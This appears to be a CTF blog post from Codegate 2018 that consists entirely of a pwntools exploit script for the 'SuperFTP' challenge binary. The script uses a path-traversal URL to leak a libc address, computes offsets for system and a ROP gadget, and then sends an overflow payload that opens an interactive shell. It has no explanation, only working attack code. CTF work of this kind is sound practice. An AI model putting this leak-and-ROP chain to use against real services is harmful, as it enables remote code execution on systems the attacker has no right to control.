  • Codegate 2018 SuperFTP
    Pwnable/CTF 2018. 2. 5. 18:51


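    # Python 2 / pwntools script for the Codegate 2018 SuperFTP binary.
    from pwn import *
    import os
     
    # Run against the local binary; the remote CTF endpoint is kept for reference.
    p=process('./ftp')
    #p=remote('ch41l3ng3s.codegate.kr',2121)
    elf=ELF('./ftp')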
     
     
    # Menu helpers: each one sends a single raw byte as the menu choice.
    def join(name,age,id_,pw):
        p.sendafter('Choice:','\x01')
        p.sendlineafter(':',name)
        p.sendlineafter(':',str(age))
        p.sendlineafter(':',id_)
        p.sendlineafter(':',pw)
     
    def printf():
        p.sendafter('Choice:','\x02')
     
    def login(id_,pw):
        p.sendafter('Choice:','\x03')
        p.sendlineafter(':',id_)
        p.sendlineafter(':',pw)
     
    def with_():
        p.sendafter('Choice:','\x04')
     
    def download_files():
        p.sendafter('Choice:','\x05')
     
    def set_9020():
        p.sendafter('Choice:','\x07')
     
    def Menu():
        p.sendafter('Choice:','\x08')    
     
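    # Create an account and log in, then drive menu options 7 and 8.
    join('AAAA',10,'AAAA','AAAA')
    login('AAAA','AAAA')
    set_9020()
    Menu()
    p.send('\x01\x00\x00\x00')
    # Stage 1: send a URL made of '/../../../' plus 24 filler bytes; the 4 bytes
    # received after sending it are used below as a libc pointer.
    payload = '/../../../'+'B'*24
    print p.recvuntil('URL:\n')
    p.sendline(payload)
    # The 4 bytes are read byte-reversed and treated as _IO_file_underflow+303.
    IO_file_underflow = u32(p.recv(4)[::-1]) - 303
    # The offsets below are specific to the libc build the script was written against.
    libc_base = IO_file_underflow - 0x6b500
    system = libc_base + 0x3b060
    cmd = libc_base + 0x15fa0f
    pop_rdi = libc_base + 0x7894f
    print hex(libc_base)
    print hex(system)
    print hex(cmd)
    print hex(pop_rdi)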
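    # Stage 2: go through the menu again and send a longer traversal URL; after
    # 48 filler bytes it carries the byte-reversed cmd, pop_rdi and system addresses.
    set_9020()
    Menu()
    p.send('\x00')
    Menu()
    p.sendline('\x01\x00\x00\x00')
    payload = 'B'*10+'/../../../../../../'+'A'*48+p32(cmd)[::-1]+p32(pop_rdi)[::-1]+p32(system)[::-1]*3
    p.sendline(payload)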
     
     
    p.interactive()